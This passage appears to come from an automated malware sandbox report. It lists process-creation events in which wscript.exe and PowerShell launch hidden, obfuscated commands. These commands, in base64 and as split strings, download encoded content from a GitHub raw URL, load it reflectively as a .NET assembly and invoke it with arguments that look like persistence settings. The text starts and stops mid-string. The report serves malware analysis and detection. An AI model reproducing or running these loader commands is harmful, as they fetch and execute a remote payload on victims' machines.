wBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::FrombaJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwA